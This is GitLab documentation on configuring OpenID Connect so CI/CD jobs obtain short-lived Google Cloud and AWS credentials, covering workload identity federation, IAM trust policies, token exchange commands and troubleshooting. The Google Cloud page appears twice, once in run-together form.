`CI_JOB_JWT_V2` was [deprecated in GitLab 15.9](../../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated) and is scheduled to be removed in GitLab 17.0. Use [ID tokens](../../yaml/_index.md#id_tokens) instead.

{{< /alert >}}

This tutorial demonstrates authenticating to Google Cloud from a GitLab CI/CD job using a JSON Web Token (JWT) and Workload Identity Federation. This configuration generates on-demand, short-lived credentials without needing to store any secrets.

To get started, configure OpenID Connect (OIDC) for identity federation between GitLab and Google Cloud. For more information on using OIDC with GitLab, read [Connect to cloud services](../_index.md).

This tutorial assumes you have a Google Cloud account and a Google Cloud project. Your account must have at least the **Workload Identity Pool Admin** permission on the Google Cloud project.

{{< alert type="note" >}}

If you would prefer to use a Terraform module and a CI/CD template instead of this tutorial, see [How OIDC can simplify authentication of GitLab CI/CD pipelines with Google Cloud](https://about.gitlab.com/blog/2023/06/28/introduction-of-oidc-modules-for-integration-between-google-cloud-and-gitlab-ci/).

{{< /alert >}}

To complete this tutorial:

1. [Create the Google Cloud workload identity pool](#create-the-google-cloud-workload-identity-pool).
1. [Create a workload identity provider](#create-a-workload-identity-provider).
1. [Grant permissions for service account impersonation](#grant-permissions-for-service-account-impersonation).
1. [Retrieve a temporary credential](#retrieve-a-temporary-credential).
## Create the Google Cloud workload identity pool

[Create a new Google Cloud workload identity pool](https://cloud.google.com/iam/docs/workload-identity-federation-with-other-clouds#create_the_workload_identity_pool_and_provider) with the following options:

- **Name**: Human-friendly name for the workload identity pool, such as `GitLab`.
- **Pool ID**: Unique ID in the Google Cloud project for the workload identity pool, such as `gitlab`. This value is used to refer to the pool and appears in URLs.
- **Description**: Optional. A description of the pool.
- **Enabled Pool**: Ensure this option is `true`.

We recommend creating a single pool per GitLab installation per Google Cloud project. If you have multiple GitLab repositories and CI/CD jobs on the same GitLab instance, they can authenticate using different providers against the same pool.

## Create a workload identity provider

[Create a new Google Cloud workload identity provider](https://cloud.google.com/iam/docs/workload-identity-federation-with-other-clouds#create_the_workload_identity_pool_and_provider) inside the workload identity pool created in the previous step, using the following options:

- **Provider type**: OpenID Connect (OIDC).
- **Provider name**: Human-friendly name for the workload identity provider, such as `gitlab/gitlab`.
- **Provider ID**: Unique ID in the pool for the workload identity provider, such as `gitlab-gitlab`. This value is used to refer to the provider, and appears in URLs.
- **Issuer (URL)**: The address of your GitLab instance, such as `https://gitlab.com/` or `https://gitlab.example.com/`.
  - The address must use the `https://` protocol.
  - The address must end in a trailing slash.
- **Audiences**: Manually set the allowed audiences list to the address of your GitLab instance, such as `https://gitlab.com` or `https://gitlab.example.com`.
  - The address must use the `https://` protocol.
  - The address must not end in a trailing slash.
- **Provider attributes mapping**: Create the following mappings, where `attribute.X` is the name of the attribute to be included as a claim in the Google token, and `assertion.X` is the value to extract from the [GitLab claim](../_index.md#id-token-authentication-for-cloud-services):

  | Attribute (on Google) | Assertion (from GitLab) |
  | --- | --- |
  | `google.subject` | `assertion.sub` |
  | `attribute.X` | `assertion.X` |

  You can also [build complex attributes](https://cloud.google.com/iam/docs/workload-identity-federation#mapping) using Common Expression Language (CEL).

  You must map every attribute that you want to use for permission granting. For example, if you want to map permissions in the next step based on the user's email address, you must map `attribute.user_email` to `assertion.user_email`.

{{< alert type="warning" >}}

For projects hosted on GitLab.com, GCP requires you to [limit access to only tokens issued by your GitLab group](https://cloud.google.com/iam/docs/workload-identity-federation-with-deployment-pipelines#gitlab-saas_2).

{{< /alert >}}

## Grant permissions for Service Account impersonation

Creating the workload identity pool and workload identity provider defines the authentication into Google Cloud. At this point, you can authenticate from a GitLab CI/CD job into Google Cloud. However, you have no permissions on Google Cloud (authorization).

To grant your GitLab CI/CD job permissions on Google Cloud, you must:

1. [Create a Google Cloud Service Account](https://cloud.google.com/iam/docs/service-accounts-create). You can use whatever name and ID you prefer.
1. [Grant IAM permissions](https://cloud.google.com/iam/docs/granting-changing-revoking-access) to your service account on Google Cloud resources. These permissions vary significantly based on your use case. In general, grant this service account the permissions on your Google Cloud project and resources you want your GitLab CI/CD job to be able to use.
   For example, if you needed to upload a file to a Google Cloud Storage bucket in your GitLab CI/CD job, you would grant this Service Account the `roles/storage.objectCreator` role on your Cloud Storage bucket.
1. [Grant the external identity permissions](https://cloud.google.com/iam/docs/workload-identity-federation-with-other-clouds#impersonate) to impersonate that Service Account. This step enables a GitLab CI/CD job to authorize to Google Cloud, via Service Account impersonation. This step grants an IAM permission on the Service Account itself, giving the external identity permissions to act as that service account. External identities are expressed using the `principalSet://` protocol.

   Much like the previous step, this step depends heavily on your desired configuration. For example, to allow a GitLab CI/CD job to impersonate a Service Account named `my-service-account` if the GitLab CI/CD job was initiated by a GitLab user with the username `chris`, you would grant the `roles/iam.workloadIdentityUser` IAM role to the external identity on `my-service-account`. The external identity takes the format:

   ```plaintext
   principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.user_login/chris
   ```

   where `PROJECT_NUMBER` is your Google Cloud project number, and `POOL_ID` is the ID (not name) of the workload identity pool created in the first section. This configuration also assumes you added `user_login` as an attribute mapped from the assertion in the previous section.

## Retrieve a temporary credential

After you configure the OIDC and role, the GitLab CI/CD job can retrieve a temporary credential from the [Google Cloud Security Token Service (STS)](https://cloud.google.com/iam/docs/reference/sts/rest).
Add `id_tokens` to your CI/CD job:

```yaml
job:
  id_tokens:
    GITLAB_OIDC_TOKEN:
      aud: https://gitlab.example.com
```

Get temporary credentials using the ID token:

```shell
PAYLOAD="$(cat <<EOF
{
  "audience": "//iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/providers/PROVIDER_ID",
  "grantType": "urn:ietf:params:oauth:grant-type:token-exchange",
  "requestedTokenType": "urn:ietf:params:oauth:token-type:access_token",
  "scope": "https://www.googleapis.com/auth/cloud-platform",
  "subjectTokenType": "urn:ietf:params:oauth:token-type:jwt",
  "subjectToken": "${GITLAB_OIDC_TOKEN}"
}
EOF
)"
```

```shell
FEDERATED_TOKEN="$(curl --fail "https://sts.googleapis.com/v1/token" \
  --header "Accept: application/json" \
  --header "Content-Type: application/json" \
  --data "${PAYLOAD}" \
  | jq -r '.access_token'
)"
```

Where:

- `PROJECT_NUMBER` is your Google Cloud project number (not name).
- `POOL_ID` is the ID of the workload identity pool created in the first section.
- `PROVIDER_ID` is the ID of the workload identity provider created in the second section.
- `GITLAB_OIDC_TOKEN` is an OIDC [ID token](../../yaml/_index.md#id_tokens).

You can then use the resulting federated token to impersonate the service account created in the previous section:

```shell
ACCESS_TOKEN="$(curl --fail "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/SERVICE_ACCOUNT_EMAIL:generateAccessToken" \
  --header "Accept: application/json" \
  --header "Content-Type: application/json" \
  --header "Authorization: Bearer FEDERATED_TOKEN" \
  --data '{"scope": ["https://www.googleapis.com/auth/cloud-platform"]}' \
  | jq -r '.accessToken'
)"
```

Where:

- `SERVICE_ACCOUNT_EMAIL` is the full email address of the service account to impersonate, created in the previous section.
- `FEDERATED_TOKEN` is the federated token retrieved from the previous step.
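Putting these pieces together, the exchange typically runs inside a single CI/CD job. A hedged sketch (the image choice is illustrative; any image with `curl` and `jq` works, and the `PAYLOAD`/`FEDERATED_TOKEN`/`ACCESS_TOKEN` steps from this section go in `script`):

```yaml
get-gcp-credential:
  image: ubuntu:24.04   # illustrative image; needs curl and jq
  id_tokens:
    GITLAB_OIDC_TOKEN:
      aud: https://gitlab.example.com
  script:
    - apt-get update && apt-get install --yes curl jq
    # Run the token-exchange requests from this section here, then use
    # ACCESS_TOKEN as a bearer token against Google Cloud APIs.
```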
The result is a Google Cloud OAuth 2.0 access token, which you can use to authenticate to most Google Cloud APIs and services when used as a bearer token. You can also pass this value to the `gcloud` CLI by setting the environment variable `CLOUDSDK_AUTH_ACCESS_TOKEN`.

## Working example

Review this [reference project](https://gitlab.com/guided-explorations/gcp/configure-openid-connect-in-gcp) for provisioning OIDC in GCP using Terraform and a sample script to retrieve temporary credentials.

## Troubleshooting

- When debugging `curl` responses, install the latest version of curl. Use `--fail-with-body` instead of `-f`. This command prints the entire body, which can contain helpful error messages.
- For more information, see [Troubleshoot Workload Identity Federation](https://cloud.google.com/iam/docs/troubleshooting-workload-identity-federation).
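The impersonation grant from the Service Account impersonation section can also be applied from the command line. A hedged sketch with hypothetical project, pool, and service account values; the `gcloud` call is shown commented because it requires project access:

```shell
PROJECT_NUMBER="123456789012"   # hypothetical Google Cloud project number
POOL_ID="gitlab"                # pool ID from the first section
SA_EMAIL="my-service-account@my-project.iam.gserviceaccount.com"  # hypothetical

# External identity for pipelines started by the GitLab user "chris":
MEMBER="principalSet://iam.googleapis.com/projects/${PROJECT_NUMBER}/locations/global/workloadIdentityPools/${POOL_ID}/attribute.user_login/chris"

# Apply the binding (requires the gcloud CLI and IAM permissions):
# gcloud iam service-accounts add-iam-policy-binding "$SA_EMAIL" \
#   --role="roles/iam.workloadIdentityUser" \
#   --member="$MEMBER"
echo "$MEMBER"
```

Swapping `attribute.user_login` for another mapped attribute (for example `attribute.project_path`) changes which pipelines may impersonate the service account.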
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Configure OpenID Connect with GCP Workload Identity Federation breadcrumbs: - doc - ci - cloud_services - google_cloud --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} `CI_JOB_JWT_V2` was [deprecated in GitLab 15.9](../../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated) and is scheduled to be removed in GitLab 17.0. Use [ID tokens](../../yaml/_index.md#id_tokens) instead. {{< /alert >}} This tutorial demonstrates authenticating to Google Cloud from a GitLab CI/CD job using a JSON Web Token (JWT) token and Workload Identity Federation. This configuration generates on-demand, short-lived credentials without needing to store any secrets. To get started, configure OpenID Connect (OIDC) for identity federation between GitLab and Google Cloud. For more information on using OIDC with GitLab, read [Connect to cloud services](../_index.md). This tutorial assumes you have a Google Cloud account and a Google Cloud project. Your account must have at least the **workload identity pool Admin** permission on the Google Cloud project. {{< alert type="note" >}} If you would prefer to use a Terraform module and a CI/CD template instead of this tutorial, see [How OIDC can simplify authentication of GitLab CI/CD pipelines with Google Cloud](https://about.gitlab.com/blog/2023/06/28/introduction-of-oidc-modules-for-integration-between-google-cloud-and-gitlab-ci/). {{< /alert >}} To complete this tutorial: 1. [Create the Google Cloud workload identity pool](#create-the-google-cloud-workload-identity-pool). 1. [Create a workload identity provider](#create-a-workload-identity-provider). 1. 
[Grant permissions for service account impersonation](#grant-permissions-for-service-account-impersonation). 1. [Retrieve a temporary credential](#retrieve-a-temporary-credential). ## Create the Google Cloud workload identity pool [Create a new Google Cloud workload identity pool](https://cloud.google.com/iam/docs/workload-identity-federation-with-other-clouds#create_the_workload_identity_pool_and_provider) with the following options: - **Name**: Human-friendly name for the workload identity pool, such as `GitLab`. - **Pool ID**: Unique ID in the Google Cloud project for the workload identity pool, such as `gitlab`. This value is used to refer to the pool and appears in URLs. - **Description**: Optional. A description of the pool. - **Enabled Pool**: Ensure this option is `true`. We recommend creating a single pool per GitLab installation per Google Cloud project. If you have multiple GitLab repositories and CI/CD jobs on the same GitLab instance, they can authenticate using different providers against the same pool. ## Create a workload identity provider [Create a new Google Cloud workload identity provider](https://cloud.google.com/iam/docs/workload-identity-federation-with-other-clouds#create_the_workload_identity_pool_and_provider) inside the workload identity pool created in the previous step, using the following options: - **Provider type**: OpenID Connect (OIDC). - **Provider name**: Human-friendly name for the workload identity provider, such as `gitlab/gitlab`. - **Provider ID**: Unique ID in the pool for the workload identity provider, such as `gitlab-gitlab`. This value is used to refer to the provider, and appears in URLs. - **Issuer (URL)**: The address of your GitLab instance, such as `https://gitlab.com/` or `https://gitlab.example.com/`. - The address must use the `https://` protocol. - The address must end in a trailing slash. 
- **Audiences**: Manually set the allowed audiences list to the address of your GitLab instance, such as `https://gitlab.com` or `https://gitlab.example.com`. - The address must use the `https://` protocol. - The address must not end in a trailing slash. - **Provider attributes mapping**: Create the following mappings, where `attribute.X` is the name of the attribute to be included as a claim in the Google token, and `assertion.X` is the value to extract from the [GitLab claim](../_index.md#id-token-authentication-for-cloud-services): | Attribute (on Google) | Assertion (from GitLab) | | --- | --- | | `google.subject` | `assertion.sub` | | `attribute.X` | `assertion.X` | You can also [build complex attributes](https://cloud.google.com/iam/docs/workload-identity-federation#mapping) using Common Expression Language (CEL). You must map every attribute that you want to use for permission granting. For example, if you want to map permissions in the next step based on the user's email address, you must map `attribute.user_email` to `assertion.user_email`. {{< alert type="warning" >}} For projects hosted on GitLab.com, GCP requires you to [limit access to only tokens issued by your GitLab group](https://cloud.google.com/iam/docs/workload-identity-federation-with-deployment-pipelines#gitlab-saas_2). {{< /alert >}} ## Grant permissions for Service Account impersonation Creating the workload identity pool and workload identity provider defines the authentication into Google Cloud. At this point, you can authenticate from a GitLab CI/CD job into Google Cloud. However, you have no permissions on Google Cloud (authorization). To grant your GitLab CI/CD job permissions on Google Cloud, you must: 1. [Create a Google Cloud Service Account](https://cloud.google.com/iam/docs/service-accounts-create). You can use whatever name and ID you prefer. 1.
[Grant IAM permissions](https://cloud.google.com/iam/docs/granting-changing-revoking-access) to your service account on Google Cloud resources. These permissions vary significantly based on your use case. In general, grant this service account the permissions on your Google Cloud project and resources you want your GitLab CI/CD job to be able to use. For example, if you needed to upload a file to a Google Cloud Storage bucket in your GitLab CI/CD job, you would grant this Service Account the `roles/storage.objectCreator` role on your Cloud Storage bucket. 1. [Grant the external identity permissions](https://cloud.google.com/iam/docs/workload-identity-federation-with-other-clouds#impersonate) to impersonate that Service Account. This step enables a GitLab CI/CD job to gain authorization in Google Cloud through Service Account impersonation. This step grants an IAM permission on the Service Account itself, giving the external identity permissions to act as that service account. External identities are expressed using the `principalSet://` protocol. Much like the previous step, this step depends heavily on your desired configuration. For example, to allow a GitLab CI/CD job to impersonate a Service Account named `my-service-account` if the GitLab CI/CD job was initiated by a GitLab user with the username `chris`, you would grant the `roles/iam.workloadIdentityUser` IAM role to the external identity on `my-service-account`. The external identity takes the format: ```plaintext principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.user_login/chris ``` where `PROJECT_NUMBER` is your Google Cloud project number, and `POOL_ID` is the ID (not name) of the workload identity pool created in the first section. This configuration also assumes you added `user_login` as an attribute mapped from the assertion in the previous section.
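The external identity string can be assembled from your own values and passed as the member of the IAM binding. A sketch with hypothetical values (`123456789012`, `gitlab`, `chris` are placeholders), shown alongside the `gcloud` binding command it would feed into:

```shell
# Hypothetical values; substitute your project number, pool ID, and GitLab username.
PROJECT_NUMBER="123456789012"
POOL_ID="gitlab"
GITLAB_USER="chris"
MEMBER="principalSet://iam.googleapis.com/projects/${PROJECT_NUMBER}/locations/global/workloadIdentityPools/${POOL_ID}/attribute.user_login/${GITLAB_USER}"
# The binding itself would then be (not run here):
#   gcloud iam service-accounts add-iam-policy-binding my-service-account@PROJECT.iam.gserviceaccount.com \
#     --role="roles/iam.workloadIdentityUser" \
#     --member="${MEMBER}"
echo "${MEMBER}"
```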
## Retrieve a temporary credential After you configure the OIDC and role, the GitLab CI/CD job can retrieve a temporary credential from the [Google Cloud Security Token Service (STS)](https://cloud.google.com/iam/docs/reference/sts/rest). Add `id_tokens` to your CI/CD job: ```yaml job: id_tokens: GITLAB_OIDC_TOKEN: aud: https://gitlab.example.com ``` Get temporary credentials using the ID token: ```shell PAYLOAD="$(cat <<EOF { "audience": "//iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/providers/PROVIDER_ID", "grantType": "urn:ietf:params:oauth:grant-type:token-exchange", "requestedTokenType": "urn:ietf:params:oauth:token-type:access_token", "scope": "https://www.googleapis.com/auth/cloud-platform", "subjectTokenType": "urn:ietf:params:oauth:token-type:jwt", "subjectToken": "${GITLAB_OIDC_TOKEN}" } EOF )" ``` ```shell FEDERATED_TOKEN="$(curl --fail "https://sts.googleapis.com/v1/token" \ --header "Accept: application/json" \ --header "Content-Type: application/json" \ --data "${PAYLOAD}" \ | jq -r '.access_token' )" ``` Where: - `PROJECT_NUMBER` is your Google Cloud project number (not name). - `POOL_ID` is the ID of the workload identity pool created in the first section. - `PROVIDER_ID` is the ID of the workload identity provider created in the second section. - `GITLAB_OIDC_TOKEN` is an OIDC [ID token](../../yaml/_index.md#id_tokens). 
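If you prefer not to hand-write the heredoc, the same payload can be built with `jq`, which also JSON-escapes the token for you. A sketch using a placeholder token (replace `PROJECT_NUMBER`, `POOL_ID`, and `PROVIDER_ID` as above):

```shell
GITLAB_OIDC_TOKEN="placeholder.jwt.token"  # in CI, this is the injected ID token
PAYLOAD="$(jq --null-input --arg token "${GITLAB_OIDC_TOKEN}" '{
  audience: "//iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/providers/PROVIDER_ID",
  grantType: "urn:ietf:params:oauth:grant-type:token-exchange",
  requestedTokenType: "urn:ietf:params:oauth:token-type:access_token",
  scope: "https://www.googleapis.com/auth/cloud-platform",
  subjectTokenType: "urn:ietf:params:oauth:token-type:jwt",
  subjectToken: $token
}')"
# Confirm the token was embedded correctly before sending the request.
printf '%s\n' "${PAYLOAD}" | jq -r '.subjectToken'
```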
You can then use the resulting federated token to impersonate the service account created in the previous section: ```shell ACCESS_TOKEN="$(curl --fail "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/SERVICE_ACCOUNT_EMAIL:generateAccessToken" \ --header "Accept: application/json" \ --header "Content-Type: application/json" \ --header "Authorization: Bearer FEDERATED_TOKEN" \ --data '{"scope": ["https://www.googleapis.com/auth/cloud-platform"]}' \ | jq -r '.accessToken' )" ``` Where: - `SERVICE_ACCOUNT_EMAIL` is the full email address of the service account to impersonate, created in the previous section. - `FEDERATED_TOKEN` is the federated token retrieved from the previous step. The result is a Google Cloud OAuth 2.0 access token, which you can use to authenticate to most Google Cloud APIs and services when used as a bearer token. You can also pass this value to the `gcloud` CLI by setting the environment variable `CLOUDSDK_AUTH_ACCESS_TOKEN`. ## Working example Review this [reference project](https://gitlab.com/guided-explorations/gcp/configure-openid-connect-in-gcp) for provisioning OIDC in GCP using Terraform and a sample script to retrieve temporary credentials. ## Troubleshooting - When debugging `curl` responses, install the latest version of curl. Use `--fail-with-body` instead of `-f`. This command prints the entire body, which can contain helpful error messages. - For more information, see [Troubleshoot Workload Identity Federation](https://cloud.google.com/iam/docs/troubleshooting-workload-identity-federation).
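- If an attribute mapping or condition does not behave as expected, decoding the claims in the ID token locally often shows why. A minimal sketch with a hypothetical `decode_jwt_claims` helper (the sample token is hand-built and unsigned; in a job you would decode `$GITLAB_OIDC_TOKEN` instead):

  ```shell
  # Decode the claims (middle) segment of a JWT for debugging.
  decode_jwt_claims() {
    payload="$(printf '%s' "$1" | cut -d '.' -f2 | tr '_-' '/+')"
    # Restore the base64 padding that JWT encoding strips.
    while [ $(( ${#payload} % 4 )) -ne 0 ]; do payload="${payload}="; done
    printf '%s' "${payload}" | base64 -d
  }

  # Hand-built, unsigned sample token for illustration only.
  SAMPLE_JWT="$(printf '{"alg":"none"}' | base64 | tr -d '=\n').$(printf '{"user_login":"chris","sub":"project_path:mygroup/myproject"}' | base64 | tr -d '=\n')."
  decode_jwt_claims "${SAMPLE_JWT}" | jq -r '.user_login'
  ```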
---
stage: Software Supply Chain Security
group: Pipeline Security
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Configure OpenID Connect in AWS to retrieve temporary credentials
---
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} `CI_JOB_JWT_V2` was [deprecated in GitLab 15.9](../../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated) and is scheduled to be removed in GitLab 17.0. Use [ID tokens](../../yaml/_index.md#id_tokens) instead. {{< /alert >}} In this tutorial, we'll show you how to use a GitLab CI/CD job with a JSON web token (JWT) to retrieve temporary credentials from AWS without needing to store secrets. To do this, you must configure OpenID Connect (OIDC) for identity federation between GitLab and AWS. For background and requirements for integrating GitLab using OIDC, see [Connect to cloud services](../_index.md). To complete this tutorial: 1. [Add the identity provider](#add-the-identity-provider) 1. [Configure the role and trust](#configure-a-role-and-trust) 1. [Retrieve a temporary credential](#retrieve-temporary-credentials) ## Add the identity provider Create GitLab as an IAM OIDC provider in AWS following these [instructions](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_create_oidc.html). Include the following information: - **Provider URL**: The address of your GitLab instance, such as `https://gitlab.com` or `http://gitlab.example.com`. This address must be publicly accessible. If this is not publicly available, see how to [configure a non-public GitLab instance](#configure-a-non-public-gitlab-instance). - **Audience**: The address of your GitLab instance, such as `https://gitlab.com` or `http://gitlab.example.com`. - The address must include `https://`. - Do not include a trailing slash. ## Configure a role and trust After you create the identity provider, configure a [web identity role](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_create_for-idp_oidc.html) with conditions for limiting access to GitLab resources.
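The `sub` claim that such a condition matches is assembled from the project path, the ref type, and the ref. A sketch with hypothetical sample values (in a real job, GitLab sets these predefined CI/CD variables):

```shell
# Sample values; in a real job, GitLab sets CI_PROJECT_PATH and CI_COMMIT_REF_NAME.
CI_PROJECT_PATH="mygroup/myproject"
CI_COMMIT_REF_NAME="main"
SUB="project_path:${CI_PROJECT_PATH}:ref_type:branch:ref:${CI_COMMIT_REF_NAME}"
echo "${SUB}"
```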
Temporary credentials are obtained using [AWS Security Token Service](https://docs.aws.amazon.com/STS/latest/APIReference/welcome.html), so set the `Action` to [sts:AssumeRoleWithWebIdentity](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html). You can create a [custom trust policy](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_create_for-custom.html) for the role to limit authorization to a specific group, project, branch, or tag. For the full list of supported filtering types, see [Connect to cloud services](../_index.md#configure-a-conditional-role-with-oidc-claims). ```json { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Federated": "arn:aws:iam::AWS_ACCOUNT:oidc-provider/gitlab.example.com" }, "Action": "sts:AssumeRoleWithWebIdentity", "Condition": { "StringEquals": { "gitlab.example.com:sub": "project_path:mygroup/myproject:ref_type:branch:ref:main" } } } ] } ``` After the role is created, attach a policy defining permissions to an AWS service (S3, EC2, Secrets Manager). ## Retrieve temporary credentials After you configure the OIDC and role, the GitLab CI/CD job can retrieve a temporary credential from [AWS Security Token Service (STS)](https://docs.aws.amazon.com/STS/latest/APIReference/welcome.html). ```yaml assume role: id_tokens: GITLAB_OIDC_TOKEN: aud: https://gitlab.example.com script: # this is split out for correct exit code handling - > aws_sts_output=$(aws sts assume-role-with-web-identity --role-arn ${ROLE_ARN} --role-session-name "GitLabRunner-${CI_PROJECT_ID}-${CI_PIPELINE_ID}" --web-identity-token ${GITLAB_OIDC_TOKEN} --duration-seconds 3600 --query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken]' --output text) - export $(printf "AWS_ACCESS_KEY_ID=%s AWS_SECRET_ACCESS_KEY=%s AWS_SESSION_TOKEN=%s" $aws_sts_output) - aws sts get-caller-identity ``` - `ROLE_ARN`: The role ARN defined in this [step](#configure-a-role-and-trust). 
- `GITLAB_OIDC_TOKEN`: An OIDC [ID token](../../yaml/_index.md#id_tokens). ## Working examples - See this [reference project](https://gitlab.com/guided-explorations/aws/configure-openid-connect-in-aws) for provisioning OIDC in AWS using Terraform and a sample script to retrieve temporary credentials. - [OIDC and Multi-Account Deployment with GitLab and ECS](https://gitlab.com/guided-explorations/aws/oidc-and-multi-account-deployment-with-ecs). - AWS Partner (APN) Blog: [Setting up OpenID Connect with GitLab CI/CD](https://aws.amazon.com/blogs/apn/setting-up-openid-connect-with-gitlab-ci-cd-to-provide-secure-access-to-environments-in-aws-accounts/). - [GitLab at AWS re:Inforce 2023: Secure GitLab CD pipelines to AWS w/ OpenID and JWT](https://www.youtube.com/watch?v=xWQGADDVn8g). ## Configure a non-public GitLab instance {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/391928) in GitLab 18.1 {{< /history >}} {{< alert type="warning" >}} This workaround is an advanced configuration option with security considerations to understand. You must be careful to correctly sync the OpenID configuration and the public keys from your private GitLab Self-Managed instance to a publicly available location such as an S3 bucket. You must also ensure that the S3 bucket and files inside are properly secured. Failing to properly secure the S3 bucket could lead to the takeover of any cloud accounts associated with this OpenID Connect identity. {{< /alert >}} If your GitLab instance is not publicly accessible, configuring OpenID Connect in AWS is not possible by default. You can use a workaround to make some specific configuration publicly accessible, enabling OpenID Connect configuration for the instance: 1. 
Store authentication details for your GitLab instance at a publicly available location, for example in S3 files: - Host the OpenID configuration for your instance in an S3 file. The configuration is available at `/.well-known/openid-configuration`, like `http://gitlab.example.com/.well-known/openid-configuration`. Update the `issuer:` and `jwks_uri:` values in the configuration file to point to the publicly available locations. - Host the public keys for your instance URL in an S3 file. The keys are available at `/oauth/discovery/keys`, like `http://gitlab.example.com/oauth/discovery/keys`. For example: - OpenID configuration file: `https://example-oidc-configuration-s3-bucket.s3.eu-north-1.amazonaws.com/.well-known/openid-configuration`. - JWKS (JSON Web Key Sets): `https://example-oidc-configuration-s3-bucket.s3.eu-north-1.amazonaws.com/oauth/discovery/keys`. - The issuer claim `iss:` in the ID Tokens and the `issuer:` value in the OpenID configuration would be: `https://example-oidc-configuration-s3-bucket.s3.eu-north-1.amazonaws.com` 1. Optional. Use an OpenID configuration validator like the [OpenID Configuration Endpoint Validator](https://www.oauth2.dev/tools/openid-configuration-validator) to validate your publicly available OpenID configuration. 1. Configure a custom issuer claim for your ID tokens. By default, GitLab ID tokens have the issuer claim `iss:` set as the address of your GitLab instance, for example: `http://gitlab.example.com`. 1. Update the issuer URL: {{< tabs >}} {{< tab title="Linux package (Omnibus)" >}} 1. Edit `/etc/gitlab/gitlab.rb`: ```ruby gitlab_rails['ci_id_tokens_issuer_url'] = 'public_url_with_openid_configuration_and_keys' ``` 1. Save the file and [reconfigure GitLab](../../../administration/restart_gitlab.md#reconfigure-a-linux-package-installation) for the changes to take effect. {{< /tab >}} {{< tab title="Helm chart (Kubernetes)" >}} 1.
Export the Helm values: ```shell helm get values gitlab > gitlab_values.yaml ``` 1. Edit `gitlab_values.yaml`: ```yaml global: appConfig: ciIdTokens: issuerUrl: 'public_url_with_openid_configuration_and_keys' ``` 1. Save the file and apply the new values: ```shell helm upgrade -f gitlab_values.yaml gitlab gitlab/gitlab ``` {{< /tab >}} {{< tab title="Docker" >}} 1. Edit `docker-compose.yml`: ```yaml version: "3.6" services: gitlab: environment: GITLAB_OMNIBUS_CONFIG: | gitlab_rails['ci_id_tokens_issuer_url'] = 'public_url_with_openid_configuration_and_keys' ``` 1. Save the file and restart GitLab: ```shell docker compose up -d ``` {{< /tab >}} {{< tab title="Self-compiled (source)" >}} 1. Edit `/home/git/gitlab/config/gitlab.yml`: ```yaml production: &base ci_id_tokens: issuer_url: 'public_url_with_openid_configuration_and_keys' ``` 1. Save the file and [reconfigure GitLab](../../../administration/restart_gitlab.md#self-compiled-installations) for the changes to take effect. {{< /tab >}} {{< /tabs >}} 1. Run the [`ci:validate_id_token_configuration` Rake task](../../../administration/raketasks/tokens/_index.md#validate-custom-issuer-url-configuration-for-cicd-id-tokens) to validate the CI/CD ID token configuration. ## Troubleshooting ### Error: `Not authorized to perform sts:AssumeRoleWithWebIdentity` If you see this error: ```plaintext An error occurred (AccessDenied) when calling the AssumeRoleWithWebIdentity operation: Not authorized to perform sts:AssumeRoleWithWebIdentity ``` It can occur for multiple reasons: - The cloud administrator has not configured the project to use OIDC with GitLab. - The role is restricted from being run on the branch or tag. See [configure a conditional role](../_index.md). - `StringEquals` is used instead of `StringLike` when using a wildcard condition. See [related issue](https://gitlab.com/guided-explorations/aws/configure-openid-connect-in-aws/-/issues/2#note_852901934). 
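For the wildcard case, the relevant fragment of the trust policy would look roughly like this (hypothetical project path; the `*` requires `StringLike`):

```json
"Condition": {
  "StringLike": {
    "gitlab.example.com:sub": "project_path:mygroup/myproject:ref_type:branch:ref:*"
  }
}
```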
### `Could not connect to openid configuration of provider` error After adding the Identity Provider in AWS IAM, you might get the following error: ```plaintext Your request has a problem. Please see the following details. - Could not connect to openid configuration of provider: `https://gitlab.example.com` ``` This error occurs when the OIDC identity provider's issuer presents a certificate chain that's out of order, or includes duplicate or additional certificates. Verify your GitLab instance's certificate chain. The chain must start with the domain or issuer URL, then the intermediate certificate, and end with the root certificate. Use this command to review the certificate chain, replacing `gitlab.example.com` with your GitLab hostname: ```shell echo | /opt/gitlab/embedded/bin/openssl s_client -connect gitlab.example.com:443 ``` ### `Couldn't retrieve verification key from your identity provider` error You might receive an error similar to: - `An error occurred (InvalidIdentityToken) when calling the AssumeRoleWithWebIdentity operation: Couldn't retrieve verification key from your identity provider, please reference AssumeRoleWithWebIdentity documentation for requirements` This error might be because: - The `.well_known` URL and `jwks_uri` of the identity provider (IdP) are inaccessible from the public internet. - A custom firewall is blocking the requests. - There's latency of more than 5 seconds in API requests from the IdP to reach the AWS STS endpoint. - STS is making too many requests to your `.well_known` URL or the `jwks_uri` of the IdP. As documented in the [AWS Knowledge Center article for this error](https://repost.aws/knowledge-center/iam-sts-invalididentitytoken), your GitLab instance needs to be publicly accessible so that the `.well_known` URL and `jwks_uri` can be resolved. 